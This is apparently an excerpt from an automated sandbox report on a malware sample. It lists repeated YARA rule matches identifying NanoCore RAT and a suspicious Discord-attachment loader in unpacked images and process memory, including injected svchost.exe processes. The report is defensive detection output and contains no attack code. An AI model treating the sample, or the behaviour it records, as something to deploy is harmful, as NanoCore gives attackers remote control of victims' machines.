    Source: 9.2.p9Ts9VV2NZ.exe.7180000.26.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 9.2.p9Ts9VV2NZ.exe.49d28c9.9.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 9.2.p9Ts9VV2NZ.exe.7300000.27.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 13.2.svchost.exe.3d8ed58.4.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 13.2.svchost.exe.3d8ed58.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 9.2.p9Ts9VV2NZ.exe.4bcc923.17.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 9.2.p9Ts9VV2NZ.exe.4aecc42.14.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 9.2.p9Ts9VV2NZ.exe.4aecc42.14.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 13.0.svchost.exe.3d8ed58.16.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 13.0.svchost.exe.3d8ed58.16.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 13.0.svchost.exe.3d8ed58.6.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 13.0.svchost.exe.3d8ed58.6.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 00000009.00000002.576136688.0000000006160000.00000004.00020000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 00000009.00000002.578985406.00000000073D0000.00000004.00020000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 00000000.00000000.354484240.0000000004271000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 00000000.00000000.354484240.0000000004271000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 00000009.00000002.578768354.0000000007320000.00000004.00020000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 00000009.00000002.565058267.0000000004928000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 00000009.00000002.575763359.00000000057B0000.00000004.00020000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 0000000F.00000000.439800347.00000000050AF000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 0000000F.00000000.439800347.00000000050AF000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 00000009.00000002.564742845.000000000407B000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 00000009.00000002.557519070.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 00000009.00000002.557519070.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 00000009.00000002.578744575.0000000007310000.00000004.00020000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 00000009.00000002.578923470.0000000007390000.00000004.00020000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 00000009.00000002.578826405.0000000007350000.00000004.00020000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 00000009.00000002.578840773.0000000007360000.00000004.00020000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 00000009.00000002.566519721.0000000004B62000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 00000009.00000002.578220944.0000000007180000.00000004.00020000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 00000009.00000002.567629894.0000000004C4D000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 00000009.00000002.578895486.0000000007380000.00000004.00020000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 00000009.00000002.578721350.0000000007300000.00000004.00020000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 00000009.00000002.578805532.0000000007340000.00000004.00020000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 0000000D.00000002.576454240.0000000003D8E000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 0000000D.00000002.576454240.0000000003D8E000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 00000009.00000002.578788151.0000000007330000.00000004.00020000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 00000009.00000002.578193481.0000000007170000.00000004.00020000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 0000000F.00000000.461847446.00000000050AF000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 0000000F.00000000.461847446.00000000050AF000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 00000009.00000002.566082157.0000000004AEC000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 0000000D.00000000.451141617.0000000003D8E000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 0000000D.00000000.451141617.0000000003D8E000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 0000000D.00000000.426806746.0000000003D8E000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 0000000D.00000000.426806746.0000000003D8E000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: Process Memory Space: p9Ts9VV2NZ.exe PID: 4588, type: MEMORYSTRMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: Process Memory Space: p9Ts9VV2NZ.exe PID: 4588, type: MEMORYSTRMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: Process Memory Space: p9Ts9VV2NZ.exe PID: 6320, type: MEMORYSTRMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: Process Memory Space: p9Ts9VV2NZ.exe PID: 6320, type: MEMORYSTRMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: Process Memory Space: svchost.exe PID: 6568, type: MEMORYSTRMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: Process Memory Space: svchost.exe PID: 6568, type: MEMORYSTRMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: Process Memory Space: svchost.exe PID: 6828, type: MEMORYSTRMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: Process Memory Space: svchost.exe PID: 6828, type: MEMORYSTRMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: p9Ts9VV2NZ.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
    Source: p9Ts9VV2NZ.exe, type: SAMPLEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
    Source: 9.2.p9Ts9VV2NZ.exe.7330000.30.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 9.2.p9Ts9VV2NZ.exe.7330000.30.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 9.2.p9Ts9VV2NZ.exe.7170000.25.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 9.2.p9Ts9VV2NZ.exe.7170000.25.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 9.2.p9Ts9VV2NZ.exe.409457d.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 9.2.p9Ts9VV2NZ.exe.409457d.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 15.2.svchost.exe.c50000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
    Source: 9.2.p9Ts9VV2NZ.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 9.2.p9Ts9VV2NZ.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 9.2.p9Ts9VV2NZ.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 15.0.svchost.exe.50afd10.16.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 15.0.svchost.exe.50afd10.16.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 15.0.svchost.exe.50afd10.16.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 9.2.p9Ts9VV2NZ.exe.4bb20c4.16.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 9.2.p9Ts9VV2NZ.exe.4bb20c4.16.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 9.2.p9Ts9VV2NZ.exe.6160000.23.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 9.2.p9Ts9VV2NZ.exe.6160000.23.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 7.0.p9Ts9VV2NZ.exe.2d0000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
    Source: 15.0.svchost.exe.c50000.1.unpack, type: UNPACKEDPEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
    Source: 13.2.svchost.exe.3d8ed58.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 13.2.svchost.exe.3d8ed58.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 13.2.svchost.exe.3d8ed58.4.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 9.2.p9Ts9VV2NZ.exe.408ff54.8.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 9.2.p9Ts9VV2NZ.exe.408ff54.8.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 9.2.p9Ts9VV2NZ.exe.4bb20c4.16.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 9.2.p9Ts9VV2NZ.exe.4bb20c4.16.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 9.2.p9Ts9VV2NZ.exe.4bb20c4.16.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 9.2.p9Ts9VV2NZ.exe.4af1a78.13.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 9.2.p9Ts9VV2NZ.exe.4af1a78.13.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 9.2.p9Ts9VV2NZ.exe.30c4ed4.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 9.2.p9Ts9VV2NZ.exe.30c4ed4.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 15.0.svchost.exe.c50000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
    Source: 9.2.p9Ts9VV2NZ.exe.7380000.34.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 9.2.p9Ts9VV2NZ.exe.7380000.34.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 9.2.p9Ts9VV2NZ.exe.7380000.34.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 9.2.p9Ts9VV2NZ.exe.7380000.34.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 9.2.p9Ts9VV2NZ.exe.6160000.23.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 9.2.p9Ts9VV2NZ.exe.6160000.23.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 9.2.p9Ts9VV2NZ.exe.7330000.30.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 9.2.p9Ts9VV2NZ.exe.7330000.30.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 9.2.p9Ts9VV2NZ.exe.7170000.25.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 9.2.p9Ts9VV2NZ.exe.7170000.25.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 0.0.p9Ts9VV2NZ.exe.1e0000.1.unpack, type: UNPACKEDPEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
    Source: 9.2.p9Ts9VV2NZ.exe.6164629.24.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 9.2.p9Ts9VV2NZ.exe.6164629.24.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 13.0.svchost.exe.1d0000.1.unpack, type: UNPACKEDPEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
    Source: 9.2.p9Ts9VV2NZ.exe.73d0000.38.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 9.2.p9Ts9VV2NZ.exe.73d0000.38.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 9.2.p9Ts9VV2NZ.exe.49f312a.10.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 9.2.p9Ts9VV2NZ.exe.49f312a.10.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 9.2.p9Ts9VV2NZ.exe.4bbe4f3.15.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 9.2.p9Ts9VV2NZ.exe.4bbe4f3.15.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 13.0.svchost.exe.1d0000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
